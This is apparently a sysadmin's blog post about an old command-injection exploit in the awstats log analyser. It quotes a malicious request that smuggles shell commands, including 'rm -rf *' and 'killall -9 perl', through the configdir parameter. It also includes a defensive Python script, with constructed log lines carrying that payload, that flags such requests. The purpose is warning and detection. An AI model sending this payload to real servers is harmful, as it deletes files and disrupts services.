awstats exploit
Simple exploit may be sitting on your server… this apparently isn’t a new one, but I don’t often review my web logs manually anymore and just discovered, quite by accident, an exploit targeting the awstats log analyser, versions older than 6.2.
cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl ...
Basically anything between the pipe characters in “configdir=|some commands|” gets executed. Yes.
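The reason the pipes work is that the vulnerable awstats versions passed the configdir value straight into Perl’s two-argument open(), where a leading or trailing “|” turns the “filename” into a command to run. A quick way to check your own logs for this, as an added example that is not code from the original post: a small Python script that parses combined-format access-log lines, percent-decodes the query string and flags any awstats.pl request whose configdir value is not a plain directory path. The log lines below are constructed for the example (the first reuses the request string from the post, the third is the same payload with the pipes and semicolons percent-encoded), and the log regex and whitelist check are my own, not part of awstats.

```python
"""Flag awstats 'configdir' command-injection attempts in web server logs."""
import re
from urllib.parse import unquote

# Constructed sample in Apache "combined" log format (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2005:04:12:01 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl| HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.3 - - [10/Mar/2005:04:13:45 +0000] "GET /cgi-bin/awstats.pl?config=example.com&output=main HTTP/1.1" 200 8901 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2005:04:14:10 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20%3Bcd%20%2Ftmp%3Brm%20-rf%20*%3Bkillall%20-9%20perl%7C HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Mar/2005:04:15:00 +0000] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 8901 "-" "Mozilla/5.0"
"""

# Hypothetical helper regex for one combined-format line: client IP, timestamp,
# request line and status code are all we need here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Characters that let a value escape into the shell once it reaches Perl's open().
SHELL_META = re.compile(r'[|;&`$<>\n]')


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode each pair.

    Done by hand rather than with urllib.parse.parse_qs because a literal ';'
    inside the injected value must not be treated as a pair separator.
    """
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        key, _, value = chunk.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs


def is_safe_configdir(value):
    """Whitelist check: a config directory is a plain path and nothing else."""
    return bool(re.fullmatch(r'[A-Za-z0-9_./-]+', value)) and '..' not in value


def scan_line(line):
    """Return a finding dict for a suspicious awstats.pl request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    if not path.endswith('/awstats.pl'):
        return None
    for key, value in parse_query(query):
        if key == 'configdir' and not is_safe_configdir(value):
            return {
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'configdir': value,
                'metachars': sorted(set(SHELL_META.findall(value))),
            }
    return None


def scan_log(text):
    """Scan every line of a log file's contents and collect the findings."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} configdir={hit['configdir']!r} "
              f"metachars={hit['metachars']}")
```

Decoding before matching is the important part: the third sample line carries the same payload with every pipe and semicolon percent-encoded, and a grep for a literal “|” would miss it. Run it against a real access log with `scan_log(open(path).read())`.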
In this case they were pulling down from a Romanian server, via wget, a Perl file made to look like a “session” file, containing an IRC server written in Perl, apparently by an Italian-speaking programmer.
Moral of the story: sign up to yet another list, or discontinue use of as many third-party packages as possible—I already do this; awstats slipped in under the wire. Upgraded and secured now. Check your versions and logs…